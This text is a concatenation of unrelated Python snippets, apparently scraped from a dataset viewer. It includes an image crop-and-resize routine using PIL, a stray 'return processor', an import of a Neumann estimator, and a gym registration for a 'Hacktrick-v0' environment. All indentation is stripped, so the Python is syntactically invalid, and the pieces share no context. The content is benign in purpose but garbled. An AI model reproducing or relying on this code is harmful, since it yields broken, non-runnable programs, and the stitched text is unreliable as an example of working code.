# Calculate the aspect ratio of `image`
orig_aspect_ratio = float(image.size[0]) / float(image.size[1])
crop_aspect_ratio = float(width) / float(height)
# Figure out if we're trimming from the left/right or top/bottom
if orig_aspect_ratio >= crop_aspect_ratio:
# `image` is wider than what's needed,
# crop from left/right sides
orig_crop_width = int((crop_aspect_ratio * float(image.size[1])) + 0.5)
orig_crop_height = image.size[1]
crop_boundary_top = 0
crop_boundary_bottom = orig_crop_height
crop_boundary_left = center_pixel_coord[0] - (orig_crop_width // 2)
crop_boundary_right = crop_boundary_left + orig_crop_width
if crop_boundary_left < 0:
crop_boundary_left = 0
crop_boundary_right = crop_boundary_left + orig_crop_width
elif crop_boundary_right > image.size[0]:
crop_boundary_right = image.size[0]
crop_boundary_left = image.size[0] - orig_crop_width
else:
# `image` is taller than what's needed,
# crop from top/bottom sides
orig_crop_width = image.size[0]
orig_crop_height = int((float(image.size[0]) / crop_aspect_ratio) + 0.5)
crop_boundary_left = 0
crop_boundary_right = orig_crop_width
crop_boundary_top = center_pixel_coord[1] - (orig_crop_height // 2)
crop_boundary_bottom = crop_boundary_top + orig_crop_height
if crop_boundary_top < 0:
crop_boundary_top = 0
crop_boundary_bottom = crop_boundary_top + orig_crop_height
elif crop_boundary_bottom > image.size[1]:
crop_boundary_bottom = image.size[1]
crop_boundary_top = image.size[1] - orig_crop_height
# Cropping the image from the original image
cropped_image = image.crop(
(
crop_boundary_left,
crop_boundary_top,
crop_boundary_right,
crop_boundary_bottom,
)
)
# Resizing the newly cropped image to the size specified
# (as determined by `width`x`height`)
return cropped_image.resize((width, height), Image.LANCZOS)
return processor
|
from .neumann import TruncatedNeumannEstimator |
from gym.envs.registration import register
register(
id='Hacktrick-v0',
entry_point='hacktrick_ai_py.mdp.hacktrick_env:Hacktrick',
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.